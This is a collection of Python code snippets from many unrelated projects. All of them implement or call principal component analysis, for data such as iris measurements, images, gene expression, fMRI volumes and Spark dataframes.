X.shape[1]\n\t\tkeepers = list(range(m))\n\t\tkeepers.pop( class_col )\n\n\t# Determine whether sample is present\n\tX_input = X.iloc[:, keepers]\n\n\t# # Visualize raw data\n\tml.plt.figure()\n\tml.sns.scatterplot(data = X, x = X_input['Petal Length (cm)'], y = X_input['Petal Width (cm)'], color = 'k', alpha = 0.5).set(title = filename + ' raw')\n\n\t# Normalize features by Z-score (so that features' units don't dominate PCs), and apply PCA\n\tX_norm, X_mean, X_std = ml.z_norm(X_input)\n\tY, P, e_scaled = ml.pca_cov( X_norm )\n\n\t# Visualize 2D PC data\n\tml.plt.figure()\n\tml.sns.scatterplot(data = Y, x = Y.iloc[:, 0], y = Y.iloc[:, 1], alpha=0.5, color = 'k').set(title = 'PC 2D Projection')\n\n\t# Visualize PCs with heatmap and cree plot\n\tinfo_retention = ml.scree_plot( e_scaled )\n\tml.pc_heatmap( P, info_retention )\n\n\t# Reconstruct data\n\treconstruct(X_input, X_mean, X_std, Y, P, e_scaled, 2, 3)\n\n\tml.plt.show()", "def pca(X, k):\n n, dim = X.shape\n\n # Center the data\n X_mean = np.mean(X, axis = 0)\n X = X - X_mean\n # Get the covariance matrix\n covariance_matrix = np.dot(X.T, X) / (n - 1)\n eigval, eigvec = eigs(covariance_matrix, k)\n return np.array(eigvec), np.array(eigval)", "def pca(image):\n # Reshape image.\n reshaped_image = np.reshape(image, (224 * 224, 3))\n # Find the covariance.\n cov = np.cov(reshaped_image, rowvar=0)\n # Eigenvalues and vectors.\n eigvals, eigvecs = np.linalg.eigh(cov)\n\n # Pick random gaussian values.\n a = np.random.normal(0, 0.1, size=(3,))\n\n scaled = eigvals * a\n delta = np.dot(eigvecs, scaled.T)\n return np.add(delta, scaled)", "def emulator(pca, gp_model, params):\n # Weights prediction\n pred_weights = gp_predict(gp_model, params)\n\n # Inverse PCA (pred_weights * basis + mean)\n reconstructed = pca.inverse_transform(pred_weights)\n return reconstructed", "def _create_PCA(self, mesh_dataset):\r\n N, V, dims = mesh_dataset.shape\r\n\r\n assert dims == 3, \"vertice dims is not 3.\"\r\n\r\n mesh_data = mesh_flatten(mesh_dataset.astype(np.float64))\r\n pca = None \r\n if hasattr(self, \"n_component\"):\r\n pca = PCA(self.n_component)\r\n \r\n print(self.n_component)\r\n unflat_function = f.partial(mesh_unflatten, vertice_size=V)\r\n print(mesh_data.shape)\r\n print(mesh_data)\r\n # pca.fit(mesh_data)\r\n pca = pca.fit(mesh_data.T)\r\n\r\n return pca, unflat_function", "def pca(X_train, X_test, n):\n\n print \"Extracting %d principle components from %d features\" % \\\n (n, X_train.shape[1])\n t0 = time()\n pca = RandomizedPCA(n_components=n, whiten=True, random_state=47).fit(X_train)\n print \"done in %0.3fs\" % (time() - t0)\n \n print \"Transforming the input data\"\n t0 = time()\n X_train_pca = pca.transform(X_train)\n X_test_pca = pca.transform(X_test)\n print \"done in %0.3fs\" % (time() - t0)\n\n return X_train_pca, X_test_pca", "def compute_pca(image_set):\n\n # Check for valid input\n assert(image_set[0].dtype == np.uint8)\n\n # Reshape data into single array\n reshaped_data = np.concatenate([image\n for pixels in image_set for image in\n pixels])\n\n # Convert to float and normalize the data between [0, 1]\n reshaped_data = (reshaped_data / 255.0).astype(np.float32)\n\n # Calculate covariance, eigenvalues, and eigenvectors\n # np.cov calculates covariance around the mean, so no need to shift the\n # data\n covariance = np.cov(reshaped_data.T)\n e_vals, e_vecs = np.linalg.eigh(covariance)\n\n # svd can also be used instead\n # U, S, V = np.linalg.svd(mean_data)\n\n pca = np.sqrt(e_vals) * e_vecs\n\n return pca", "def generate_pca(X, y, cols, n_components, **kwargs):\n\n pca = PCA(n_components, **kwargs)\n pca_result = pca.fit_transform(X)\n pca_df = pd.DataFrame(pca_result, columns=cols, index=X.index)\n pca_df['label'] = y\n pca_plot = ggplot(pca_df, aes(x=\"PCA-1\", y=\"PCA-2\", color='label') ) + geom_point(size=100,alpha=0.8) + ggtitle(\"First and Second Principal Components colored by class\")\n return pca_plot", "def pca(self):\n if not self._initialised and not self.cache_valid:\n msg = \"No reference images added or previously computed PCA basis loaded\"\n raise RuntimeError(msg)\n if not self.cache_valid:\n self.pca_results = self._pca()\n self.cache_valid = True\n return self.pca_results", "def pca(frame,columns=[],k=320,frame_type='spark'):\n if frame_type == 'spark':\n # https://stackoverflow.com/questions/33428589/pyspark-and-pca-how-can-i-extract-the-eigenvectors-of-this-pca-how-can-i-calcu/33481471\n from numpy.linalg import eigh\n from pyspark.ml.linalg import Vectors\n from pyspark.ml.feature import VectorAssembler\n from pyspark.ml.feature import StandardScaler\n from pyspark.ml import Pipeline\n\n assembler = VectorAssembler(\n inputCols=columns,\n outputCol=\"features\")\n scaler = StandardScaler(inputCol=assembler.getOutputCol(),\n outputCol=\"scaledFeatures\",\n withStd=False,\n withMean=True)\n pipeline = Pipeline(stages=[assembler,scaler])\n model = pipeline.fit(frame)\n df = model.transform(frame)\n\n def estimateCovariance(df):\n \"\"\"Compute the covariance matrix for a given dataframe.\n\n Note:\n The multi-dimensional covariance array should be calculated using outer products. Don't\n forget to normalize the data by first subtracting the mean.\n\n Args:\n df: A Spark dataframe with a column named 'features', which (column) consists of DenseVectors.\n\n Returns:\n np.ndarray: A multi-dimensional array where the number of rows and columns both equal the\n length of the arrays in the input dataframe.\n \"\"\"\n import numpy as np\n m = df.select(df['scaledFeatures']).map(lambda x: x[0]).mean()\n dfZeroMean = df.select(df['scaledFeatures']).map(lambda x: x[0]).map(lambda x: x-m) # subtract the mean\n\n return dfZeroMean.map(lambda x: np.outer(x,x)).sum()/df.count()\n\n cov = estimateCovariance(df)\n col = cov.shape[1]\n eigVals, eigVecs = eigh(cov)\n inds = np.argsort(eigVals)\n eigVecs = eigVecs.T[inds[-1:-(col+1):-1]]\n components = eigVecs[0:k]\n eigVals = eigVals[inds[-1:-(col+1):-1]] # sort eigenvals\n score = df.select(df['scaledFeatures']).map(lambda x: x[0]).map(lambda x: np.dot(x, components.T) )\n\n #Show the Variance explained\n print('Vairance Explained:', sum(eigVals[0:k])/sum(eigVals) )\n\n # Return the `k` principal components, `k` scores, and all eigenvalues\n return components.T, score, eigVals\n elif frame_type in ['h2o','pandas']:\n raise Exception('Not Implemented yet.')", "def PCA_vis(select_PCA_features, player_attributes):\n x = player_attributes.loc[:, select_PCA_features].values\n\n # Standardizing the features\n x = StandardScaler().fit_transform(x)\n\n # perform 3 component PCA\n pca = PCA(n_components=3)\n principalComponents = pca.fit_transform(x)\n principalDf = pd.DataFrame(\n data=principalComponents,\n columns=[\n \"principal component 1\",\n \"principal component 2\",\n \"principal component 3\",\n ],\n )\n\n # plot players dataset projection on three principal components\n # %matplotlib notebook\n\n fig = plt.figure(figsize=(8, 8))\n ax = fig.add_subplot(1, 1, 1, projection=\"3d\")\n ax.set_title(\"3 component PCA\", fontsize=30)\n\n # plot first k players' info along principal components\n k = 4000\n ax.scatter(\n principalDf.loc[:k, \"principal component 1\"],\n principalDf.loc[:k, \"principal component 2\"],\n principalDf.loc[:k, \"principal component 3\"],\n s=1,\n )\n\n ax.set_xlabel(\"Principal Component 1\", fontsize=15)\n ax.set_ylabel(\"Principal Component 2\", fontsize=15)\n ax.set_zlabel(\"Principal Component 3\", fontsize=15)\n plt.show()\n\n return principalDf", "def get_pca_data(dataframe):\n # We don't reduce dimensionality, but overlay the 2 principal components in 2D.\n pca = PCA(n_components=2)\n \n x = dataframe[['df1', 'df2']].values\n try:\n # df1 and df2 have the same scale. No need to standardize. Standardizing might actually distort PCA here.\n pca.fit(x)\n except ValueError:\n # Return empty.\n df = pd.DataFrame(columns=['var_expl', 'var_expl_ratio', 'x', 'y', 'meanx', 'meany'])\n else:\n df = pd.DataFrame({'var_expl': pca.explained_variance_.T,\n 'var_expl_ratio': pca.explained_variance_ratio_.T * 100, # In percent\n 'x': pca.components_[:, 0],\n 'y': pca.components_[:, 1],\n 'meanx': pca.mean_[0],\n 'meany': pca.mean_[1],\n },\n index=[1, 2] # For designating principal components.\n )\n df.index.rename('PC', inplace=True)\n return df", "def pca(adata, n_components=50, train_ratio=0.35, n_batches=50, gpu=False):\n\n train_size = math.ceil(adata.X.shape[0] * train_ratio)\n\n if gpu:\n from cuml.decomposition import PCA\n import cupy as cp\n else:\n from sklearn.decomposition import PCA\n import numpy as cp\n\n pca = PCA(n_components=n_components).fit(adata.X[:train_size])\n \n embeddings = cp.zeros((adata.X.shape[0], n_components))\n batch_size = int(embeddings.shape[0] / n_batches)\n for batch in range(n_batches):\n start_idx = batch * batch_size\n end_idx = start_idx + batch_size\n\n if(adata.X.shape[0] - end_idx < batch_size):\n end_idx = adata.X.shape[0]\n\n embeddings[start_idx:end_idx,:] = cp.asarray(pca.transform(adata.X[start_idx:end_idx]))\n \n if gpu:\n embeddings = embeddings.get()\n\n adata.obsm[\"X_pca\"] = embeddings\n return adata", "def pca_reduction(X, ncomp=20):\n print('Performing dimensionality reduction ...')\n\n # PCA fitting\n pca = PCA(n_components=ncomp)\n weights = pca.fit_transform(X)\n basis = pca.components_\n\n # # Plot cumsum(explained_variance) versus component\n # plt.semilogy(pca.explained_variance_ratio_*100, 's')\n # plt.ylabel('Explained Variance Ratio (%)', size=20)\n # plt.xticks(size=20)\n # plt.xlabel('Component', size=20)\n # plt.yticks(size=20)\n # plt.show()\n\n print('Explained variance ratio : '+str(round(np.cumsum(pca.explained_variance_ratio_)[-1]*100, 2))+' %.')\n\n # pickle.dump(pca, '/../Data/GPmodel/pca_'+str(ncomp))\n\n # Some plots on PCA\n # plot_pca(basis, weights)\n\n return pca, weights", "def pca(points: np.ndarray, axis: Optional[Any] = None) -> np.ndarray:\n\n # Perform PCA to understand what the primary axis\n # of the given point set is\n mean = np.mean(points, axis=0)\n # Points have to be zero-mean\n centered = points - mean\n # np.linalg.eig takes a covariance matrix as an argument\n cov = np.cov(centered.T)\n # Call eigenvector decomposition to obtain principal components\n eigenval, eigenvec = np.linalg.eig(cov)\n # We want to parametrize target straight line\n # in the coordinate frame given by the eigenvector\n # that corresponds to the biggest eigenvalue\n argmax_eigen = np.argmax(eigenval)\n # We'll need projections of data points\n # on the primary axis\n loc_pca = np.dot(centered, eigenvec)\n loc_maxeigen = loc_pca[:, argmax_eigen]\n max_eigenval = eigenval[argmax_eigen]\n max_eigenvec = eigenvec[:, argmax_eigen]\n # Re-parametrize the line\n loc_start = mean + max_eigenvec * loc_maxeigen[0]\n loc_final = mean + max_eigenvec * loc_maxeigen[-1]\n linspace = np.linspace(0, 1, num=len(points))\n positions = loc_start + np.outer(linspace, loc_final - loc_start)\n\n if axis is not None:\n for ax in axis:\n ax.set_title(\"PCA\")\n ax.plot(points[:, 0], points[:, 1], 'or')\n ax.plot(positions[:, 0], positions[:, 1], 'o-', mfc='none')\n ax.grid(True, linestyle='--')\n ax.axis('equal')\n\n return positions", "def get_features_from_pca(feat_num, feature):\n\n if feature == 'HoG':\n vocab = np.load('vocab_hog.npy')\n elif feature == 'SIFT':\n vocab = np.load('vocab_sift.npy')\n\n # Your code here. You should also change the return value.\n\n def _get_PCA_vectors(feat_num, vocab):\n\n mean = vocab.mean(axis=0, keepdims=True)\n vocab_normalized = vocab - np.multiply(np.ones([vocab.shape[0], mean.shape[0]]),\n mean)\n #TEST: mean unit test\n #mean = vocab_normalized.mean(axis=0, keepdims=True)\n\n cov_matrix = np.cov(np.transpose(vocab_normalized))\n sigma, V = np.linalg.eig(cov_matrix)\n order_sigma = np.argsort(sigma)\n\n PCA_vectors = []\n i = 1\n for f in range(len(order_sigma)):\n eigen_vector = V[:, order_sigma[i]]\n if all(True for _ in np.isreal(eigen_vector)):\n PCA_vectors.append(np.real(eigen_vector))\n i += 1\n if len(PCA_vectors) == feat_num:\n break\n\n return np.array(PCA_vectors)\n\n #MAIN\n PCA_vectors = _get_PCA_vectors(feat_num, vocab)\n\n d = np.dot(vocab, np.transpose(PCA_vectors))\n\n return np.dot(vocab, np.transpose(PCA_vectors))\n #return np.zeros((vocab.shape[0],2))", "def pca(\n data: AnnData,\n n_components: int = 50,\n features: str = \"highly_variable_features\",\n standardize: bool = True,\n max_value: float = 10,\n random_state: int = 0,\n) -> None:\n\n keyword = select_features(data, features)\n\n start = time.time()\n\n X = data.uns[keyword]\n\n if standardize:\n # scaler = StandardScaler(copy=False)\n # scaler.fit_transform(X)\n m1 = X.mean(axis=0)\n psum = np.multiply(X, X).sum(axis=0)\n std = ((psum - X.shape[0] * (m1 ** 2)) / (X.shape[0] - 1.0)) ** 0.5\n std[std == 0] = 1\n X -= m1\n X /= std\n\n if max_value is not None:\n X[X > max_value] = max_value\n X[X < -max_value] = -max_value\n\n pca = PCA(n_components=n_components, random_state=random_state)\n X_pca = pca.fit_transform(X)\n\n data.obsm[\"X_pca\"] = X_pca\n data.uns[\n \"PCs\"\n ] = pca.components_.T # cannot be varm because numbers of features are not the same\n data.uns[\"pca\"] = {}\n data.uns[\"pca\"][\"variance\"] = pca.explained_variance_\n data.uns[\"pca\"][\"variance_ratio\"] = pca.explained_variance_ratio_\n\n end = time.time()\n logger.info(\"PCA is done. Time spent = {:.2f}s.\".format(end - start))", "def feature_cPCA(wv, n_components=12, incremental=False, batch_size=None):\n if incremental:\n raise NotImplementedError(\"Can't run incremental PCA yet.\")\n\n ers = np.reshape(np.transpose(wv, axes=(1, 0, 2)), (N_SAMPLES * N_CHANNELS, -1))\n pca = PCA(n_components)\n scores = pca.fit_transform(ers.T)\n return scores", "def doPCA(df, grouping_variable, features_to_analyse, plot_save_dir=None, PCs_to_keep=10):\n \n data = df[features_to_analyse]\n \n # Normalise the data before PCA\n zscores = data.apply(zscore, axis=0)\n \n # Drop features with NaN values after normalising\n colnames_before = list(zscores.columns)\n zscores.dropna(axis=1, inplace=True)\n colnames_after = list(zscores.columns)\n nan_cols = [col for col in colnames_before if col not in colnames_after]\n if len(nan_cols) > 0:\n print(\"Dropped %d features with NaN values after normalization:\\n%s\" %\\\n (len(nan_cols), nan_cols))\n\n print(\"\\nPerforming Principal Components Analysis (PCA)...\")\n \n # Fit the PCA model with the normalised data\n pca = PCA()\n pca.fit(zscores)\n \n # Project data (zscores) onto PCs\n projected = pca.transform(zscores) # A matrix is produced\n # NB: Could also have used pca.fit_transform()\n\n # Plot summary data from PCA: explained variance (most important features)\n important_feats, fig = pcainfo(pca, zscores, PC=1, n_feats2print=10) \n \n if plot_save_dir:\n # Save plot of PCA explained variance\n PCAplotroot = Path(plot_save_dir) / 'PCA'\n PCAplotroot.mkdir(exist_ok=True, parents=True)\n PCAplotpath = PCAplotroot / ('control_variation_in_' + \n grouping_variable + \n '_PCA_explained.eps')\n savefig(PCAplotpath, tight_layout=True, tellme=True, saveFormat='eps')\n plt.pause(2); plt.close()\n else:\n PCAplotpath=None\n plt.show(); plt.pause(2); plt.close()\n \n # Store the results for first few PCs in dataframe\n projected_df = pd.DataFrame(projected[:,:PCs_to_keep],\n columns=['PC' + str(n+1) for n in range(PCs_to_keep)]) \n \n # Add concatenate projected PC results to metadata\n projected_df.set_index(df.index, inplace=True) # Do not lose video snippet index position\n \n df = pd.concat([df, projected_df], axis=1)\n\n # Plot PCA - Variation in control data with respect to a given variable (eg. date_recording_yyyymmdd)\n \n # 2-PC\n if plot_save_dir:\n PCAplotpath = Path(str(PCAplotpath).replace('_PCA_explained', \n '_PCA_2_components'))\n title = \"2-Component PCA: Control variation in\\n\\\n '{0}'\".format(grouping_variable) + \" (Top256 features)\"\n plotPCA(df, grouping_variable, var_subset=None, savepath=PCAplotpath, \n title=title, n_component_axes=2)\n plt.pause(2); plt.close()\n \n # 3-PC\n if plot_save_dir:\n PCAplotpath = Path(str(PCAplotpath).replace('_PCA_2_components', \n '_PCA_3_components'))\n title = \"3-Component PCA: Control variation in\\n\\\n '{0}'\".format(grouping_variable) + \" (Top256 features)\"\n plotPCA(df, grouping_variable, var_subset=None, savepath=PCAplotpath, \n title=title, n_component_axes=3, rotate=False)\n plt.pause(2)\n \n return df", "def runPCA(data, reducedDimensions, showScree):\n print(\"-->Running PCA.\")\n latent = gp.pca(data['features'], reducedDimensions, showScree, savePlots)\n plot(latent, data['colours'], reducedDimensions, \"Iris Dataset\", \"PCA\")", "def pca_helper(_args):\n # unpack args\n _trimmed_frame, _win, _sou_name, _sou_dir, _out_path, \\\n _library, _library_names_short, _fwhm, _plsc, _sigma, _nrefs, _klip = _args\n\n # run pca\n try:\n output = pca(_trimmed_frame=_trimmed_frame, _win=_win, _sou_name=_sou_name,\n _sou_dir=_sou_dir, _out_path=_out_path,\n _library=_library, _library_names_short=_library_names_short,\n _fwhm=_fwhm, _plsc=_plsc, _sigma=_sigma, _nrefs=_nrefs, _klip=_klip)\n return output\n except Exception as _e:\n print(_e)\n return None\n # finally:\n # return None", "def PCA_reduction(\n df: pd.DataFrame,\n cols: List[str],\n n_components: int,\n prefix: str = 'PCA_',\n random_seed: int = 42,\n keep: bool = False\n) -> pd.DataFrame:\n print(\"Executing PCA reduction on dataset...\")\n df = df.copy()\n pca = decomposition.PCA(n_components=n_components, random_state=random_seed)\n\n principal_components = pca.fit_transform(df[cols])\n\n principal_df = pd.DataFrame(principal_components)\n if not keep:\n df.drop(cols, axis=1, inplace=True)\n\n principal_df.rename(columns=lambda x: str(prefix) + str(x), inplace=True)\n\n # Align index of principal components and the original dataset.\n principal_df = principal_df.set_index(df.index)\n\n df = pd.concat([df, principal_df], axis=1)\n\n return df", "def run_pca(df, cols=None): \n import numpy as np\n import pandas as pd\n import matplotlib.pyplot as plt\n from mpl_toolkits.mplot3d import Axes3D\n from sklearn.preprocessing import StandardScaler\n from sklearn.decomposition import PCA\n import mpld3\n\n # Define and markers to use for different categories\n groups_dict = {(u'D', 0):('Germany, unregulated', 'g', 'o'),\n (u'N', 0):('Norway, unregulated', 'b', 'o'),\n (u'D', 1):('Germany, regulated', 'g', '^'),\n (u'N', 1):('Norway, regulated', 'b', '^')}\n \n # Extract cols of interest\n cats = df[['country', 'regulated']]\n\n if cols:\n df = df[cols].astype(float)\n\n # Standardise the feature data\n feat_std = StandardScaler().fit_transform(df)\n\n # Setup PCA. Initially, choose to keep ALL components\n pca = PCA()\n\n # Fit model\n pca.fit(feat_std)\n\n # Get explained variances (in %)\n var_exp = 100*pca.explained_variance_ratio_\n cum_exp = np.cumsum(var_exp)\n\n # Get eigenvalues\n cov_mat = np.cov(feat_std.T)\n eig_vals, eig_vecs = np.linalg.eig(cov_mat)\n\n # Get number of EVs > 1 (Kaiser-Guttman criterion)\n # and print summary\n n_kgc = (eig_vals > 1).sum()\n print 'Variance explained by first %s PCs (%%):\\n' % n_kgc\n print var_exp[:n_kgc]\n print '\\nTotal: %.2f%%' % var_exp[:n_kgc].sum()\n \n # Plot\n fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 6))\n \n # Explained variance\n axes[0].bar(range(1, len(var_exp)+1), var_exp, \n align='center', label='Individual components')\n axes[0].plot(range(1, len(cum_exp)+1), cum_exp, \n 'r-o', label='Cumulative')\n axes[0].set_xlabel('Principal component')\n axes[0].set_ylabel('Variance explained (%)')\n axes[0].legend(loc='center right')\n \n # Eigenvalues\n axes[1].plot(range(1, len(eig_vals)+1), np.sort(eig_vals)[::-1], \n 'r-o', label='Eigenvalues')\n axes[1].axhline(1, c='k', ls='-', label='Kaiser-Guttman threshold')\n axes[1].set_xlabel('Principal component')\n axes[1].set_ylabel('Eigenvalue')\n axes[1].legend(loc='upper right') \n \n # PC loadings\n loads = pd.DataFrame(data=pca.components_, \n columns=df.columns,\n index=range(1, pca.components_.shape[0]+1)).T\n\n # Project into 2 and 3 components\n fig = plt.figure(figsize=(16, 6))\n \n # Plot 2 components\n ax = fig.add_subplot(1, 2, 1)\n \n # Refit the PCA, this time specifying 2 components\n # and transforming the result\n feat_reduced = PCA(n_components=2).fit_transform(feat_std)\n \n # Build df \n data = pd.DataFrame({'PC1':feat_reduced[:, 0],\n 'PC2':feat_reduced[:, 1],\n 'country':cats['country'],\n 'regulated':cats['regulated']}) \n\n groups = data.groupby(['country', 'regulated'])\n \n # Plot\n for name, group in groups:\n ax.scatter(group['PC1'], group['PC2'], s=60,\n label=groups_dict[name][0],\n c=groups_dict[name][1],\n marker=groups_dict[name][2])\n \n ax.set_xlabel('First principal component')\n ax.set_ylabel('Second principal component')\n ax.set_title('First two PCA directions')\n \n # Plot 3 components\n ax = fig.add_subplot(1, 2, 2, projection='3d', \n elev=-150, azim=135)\n\n # Refit the PCA, this time specifying 3 components\n # and transforming the result\n feat_reduced = PCA(n_components=3).fit_transform(feat_std)\n\n # Build df with colours\n data = pd.DataFrame({'PC1':feat_reduced[:, 0],\n 'PC2':feat_reduced[:, 1],\n 'PC3':feat_reduced[:, 2],\n 'country':cats['country'],\n 'regulated':cats['regulated']}) \n \n groups = data.groupby(['country', 'regulated'])\n \n # Plot\n for name, group in groups:\n ax.scatter(group['PC1'], group['PC2'], group['PC3'],\n label=groups_dict[name][0],\n c=groups_dict[name][1],\n marker=groups_dict[name][2],\n s=60)\n \n ax.set_title('First three PCA directions')\n ax.set_xlabel('First principal component')\n ax.set_ylabel('Second principal component')\n ax.set_zlabel('Third principal component')\n ax.legend(bbox_to_anchor=(0.15, -0.1), frameon=True)\n plt.show()\n\n return loads", "def my_pca(data_matrix, k):\n cov_matrix = np.cov(data_matrix.transpose())\n \n eigenvalues, eigenvectors = np.linalg.eig(cov_matrix)\n eigenvalues.sort()\n # sorts the eigenvalues in ascending order\n decending_eigenvalues = eigenvalues[-k:][::-1]\n # choose the highest k values and change the order to decending\n \n evalues, evectors = np.linalg.eig(cov_matrix)\n \n index_list = []\n for i in decending_eigenvalues:\n indexes = np.where(i == evalues)[0][0]\n index_list.append(indexes)\n \n \n evector_list = []\n for i in index_list:\n evector_list.append(evectors[i])\n \n evector_array = np.array(evector_list)\n \n reduced_matrix = np.dot(data_matrix, evector_array.transpose())\n \n return pd.DataFrame(reduced_matrix)", "def PCA_gen(pos, k = 6, self_loop = False):\n\n # Use PCA to find principle component projection\n p_components = PCA(n_components = 1).fit_transform(pos)\n\n a_idxs = neighbors(p_components, self_loop, k)\n ones = np.ones(size = a_idxs.shape[0])\n\n a = csr_matrix(ones, (a_idxs[:,0], a_idxs[:, 1]))\n\n return a", "def pca_detector(data):\n #- 'vol_shape' is the shape of volumes\n vol_shape = data.shape[:-1]\n #- 'n_vols' is the number of volumes\n n_vols = data.shape[-1]\n #- N is the number of voxels in a volume\n N = np.prod(vol_shape)\n\n #- Reshape to 2D array that is voxels by volumes (N x n_vols)\n # transpose to n_vols x N\n X = data.reshape((N, n_vols)).T\n\n \"\"\"\n The first part of the code will use PCA to get component matrix U\n and scalar projections matrix C\n \"\"\"\n\n #- Calculate unscaled covariance matrix for X\n unscaled_cov = X.dot(X.T)\n\n #- Use SVD to return U, S, VT matrices from unscaled covariance\n U, S, VT = npl.svd(unscaled_cov)\n\n #- Calculate the scalar projections for projecting X onto the vectors in U.\n #- Put the result into a new array C.\n C = U.T.dot(X)\n # set nans to 0\n C[np.isnan(C)] = 0\n #- Transpose C\n #- Reshape C to have the 4D shape of the original data volumes.\n C_vols = C.T.reshape((vol_shape + (n_vols,)))\n\n \"\"\"\n The second part of the code determines which voxels are inside the brain\n and which are outside the brain and creates a mask (boolean matrix)\n \"\"\"\n\n #get the mean voxel intensity of entire 4D object\n mean_voxel = np.mean(data)\n #get the mean volume (3D) across time series (axis 3)\n mean_volume = np.mean(data, axis=3)\n #boolean mask set to all voxels above .5 in the first volume\n #(.125 is the SPM criterion but .5 seems like a better threshold)\n mask = mean_volume > (.5 * mean_voxel) #threshold can be adjusted!\n out_mask = ~mask\n\n \"\"\"\n The third part of code finds the root mean square of U from step 1, then uses the\n mask from step 2 to determine which components explain data outside the brain\n Selects these \"bad components\" with high \"outsideness\"\n \"\"\"\n\n #Apply mask to C matrix to get all voxels outside of brain\n outside = C_vols[out_mask]\n #Get RMS of the voxels outside, reflecting \"outsideness\" of this scan\n RMS_out = np.sqrt(np.mean((outside ** 2), axis=0))\n\n #Apply mask to C matrix to get all voxels inside brain\n inside = C_vols[mask]\n #Get RMS of the voxels inside, reflecting \"insideness\" of this scan\n RMS_in = np.sqrt(np.mean((inside ** 2), axis=0))\n\n #The closer this ratio is to 1, the worse the volume\n RMS_ratio = RMS_out / RMS_in\n\n \"\"\"\n The fourth part of the code uses the \"bad components\" to generate a new\n \"bad data set\" and then puts this dataset through the outlier detector\n \"\"\"\n\n #Create a boolean mask for the 10% worst PCs (meaning highest RMS ratio)\n PC_bad = np.percentile(RMS_ratio, 90)\n PC_bad_mask = RMS_ratio > PC_bad\n\n U_bad = U[:, PC_bad_mask]\n C_bad = C[PC_bad_mask]\n\n #generates data set based on the bad PCs and (U and C matrices)\n X_bad = U_bad.dot(C_bad).T.reshape((vol_shape + (n_vols,)))\n\n # calculate outliers using iqr_detector\n _, outliers = mah_detector(X_bad)\n\n return X_bad, outliers", "def _mps_decompose_CA(self, A):\n Dl, d, Dr = A.shape\n Q, C = qr(np.reshape(A, [Dl, d * Dr]).T)\n nC = nfactor(C)\n # nC = max(abs(C.min()), abs(C.max()))\n if C.shape == (1, 1):\n Q *= np.sign(C.flat[0])\n C = np.ones((1, 1))\n else:\n C = (C.T) / nC\n Dl = C.shape[1]\n Q = np.reshape(Q.T, [Dl, d, Dr])\n return C, Q, nC, Dl", "def sparsepca(X, n_comp):\n n_samples, n_features = X.shape\n # center the data. Note we only do the global centering. i.e. earch column\n # is centered to zero mean. Though the data should already 'locally'\n # centered since each row is normalized to z score. \n X = X - X.mean(axis = 0)\n estimator = decomposition.SparsePCA(n_components=n_comp, alpha=0.8, max_iter = 100, n_jobs = 20, verbose = 1, tol = 1e-2)\n t0 = time()\n estimator.fit(X)\n train_time = (time() - t0)\n print \"done in %0.3fs\" % train_time\n components_ = estimator.components_\n X_projected = estormator.transform(X)\n \n return components_, X_projected", "def pca(adata: AnnData, *args, **kwargs):\n\n scatters(adata, \"pca\", *args, **kwargs)", "def pca(data,k=None,frac=0.99,whiten=1):\n n,d = data.shape\n mean = average(data,axis=0).reshape(1,d)\n data = data - mean.reshape(1,d)\n cov = dot(data.T,data)/n\n evals,evecs = linalg.eig(cov)\n if k is None: k = fraction(evals,frac)\n top = argsort(-evals)\n evals = evals[top[:k]]\n evecs = evecs.T[top[:k]]\n assert evecs.shape==(k,d)\n ys = dot(evecs,data.T)\n assert ys.shape==(k,n)\n if whiten: ys = dot(diag(sqrt(1.0/evals)),ys)\n return (ys.T,mean,evals,evecs)", "def inverse_pca(self, pca_img, components):\n reconstruct = np.dot(pca_img, components.T).astype(int)\n return reconstruct.reshape(-1, 28, 28)", "def testPCA(d = 10, N = 5000, k = 4, min_iter_nr = 20):\n\n print \"Input: dim, samples nr = %d, %d - Output: latent factors nr = %d\" % (d, N, k)\n mu = uniform(1, d)*3.+2.\n sigma = uniform((d,))*0.01\n A = normal(size=(k,d))\n\n # latent variables\n y = normal(0., 1., size=(N, k))\n # observations\n noise = normal(0., 1., size=(N, d)) * sigma\n x = dot(y, A) + mu + noise\n \n # Testing PCA \n for _b, _n in product((True, False), (min_iter_nr, )):\n t_start = time.time()\n PCA = pca(x.T, k = k)\n PCA.InferandLearn(max_iter_nr = _n, svd_on = _b)\n print \"PCA(svd_on=%s, max_iter_nr=%d) learned in %.5f seconds\" % (str(_b), _n, time.time() - t_start)\n print PCA.C\n print \"-\"*70", "def pca(tiles: np.ndarray, n_components: int = 5) -> np.ndarray:\n ntiles = len(tiles)\n npix = tiles[0].shape[0]\n tiles = (tiles).reshape(ntiles, npix ** 2)\n # ensure data is mean-centred\n for idx in range(ntiles):\n tiles[idx] -= np.mean(tiles[idx])\n # compute principle components\n pca = PCA(n_components=n_components, whiten=True).fit(tiles)\n # reconstruct independent signals based on orthogonal components\n components = pca.transform(tiles)\n cleaned_tiles = pca.inverse_transform(components)\n return cleaned_tiles.reshape(ntiles, npix, npix)", "def analyse_pca(cluster, three_dim=True):\n # create data array and name array:\n A = cluster.data_matrix\n names = cluster.row_header\n\n # assign colours to samples:\n colorconvert = {'F':'go', 'S':'co', 1:'ro', 2:'go', 3:'ko', 4:'bo', 5:'co', 6:'mo', 7:'yo', 8:'r<', 9:'g<', 10:'k<', 11:'b<', 12:'c<', 13:'m<', 14:'y<', 15:'rs', 16:'gs', 17:'ks', 18:'bs', 19:'cs', 20:'ms', 21:'ys' }\n colourlist = []\n for name in names:\n phase = re.search(\"(F|S)\", name)\n if phase is not None:\n #print phase.groups()[0]\n colourlist.append(colorconvert[phase.groups()[0]])\n else:\n colourlist.append('ko')\n #print names, \"\\n\", colourlist\n\n ############# PCA using numpy SVD decomposition ##################################\n print \"#\" * 30\n print \"SVA analysis\"\n U, s, Vt = numpy.linalg.svd(A, full_matrices=True)\n V = Vt.T\n\n # sort the PCs by descending order of the singular values (i.e. by the\n # proportion of total variance they explain)\n ind = numpy.argsort(s)[::-1]\n U = U[:, ind]\n s = s[ind]\n V = V[:, ind]\n S = numpy.diag(s)\n\n sumval = sum([ i ** 2 for i in s ])\n\n # if we use all of the PCs we can reconstruct the noisy signal perfectly\n\n # Mhat = numpy.dot(U, numpy.dot(S, V.T))\n # if we use only the first 2 PCs the reconstruction is less accurate\n # Mhat2 = numpy.dot(U[:, :2], numpy.dot(S[:2, :2], V[:,:2].T))\n\n # To remove the variance of the 1st PC, which is primarily associated with experimenter:\n matrix_reduced = numpy.dot(U[:,1:], numpy.dot(S[1:,1:], V[:,1:].T))\n #for checking decomposition is occurring properly:\n #print numpy.shape(U)\n #print numpy.shape(S)\n #print numpy.shape(Vt)\n #print numpy.shape(matrix_reduced)\n\n #print \"#\" * 30\n #print \"SVD eigenvectors/loadings:\"\n #print header[:var_num] , 